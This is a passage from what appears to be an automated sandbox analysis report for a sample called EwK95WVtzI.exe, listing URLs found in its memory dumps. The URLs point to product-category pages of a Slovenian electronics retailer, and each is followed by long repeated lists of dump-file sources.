00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/zice-temperaturno-obstojne-za-prikl
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracije/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kalibracijski-instrument
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kovcki-za-merilno-opremo
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/krmilne-elektro-omarice/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/alarmne-in-napajalne-enote/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/dodatna-oprema-inor/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/izolatorji-signalov-in-izolacijski-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/temperaturni-merilni-pretvorniki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/terenska-ohisja-in-prikazovalniki/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kapa
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kond
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/plav
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/filmski-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/regulato
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/koncna-in-magnetna-stikal
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 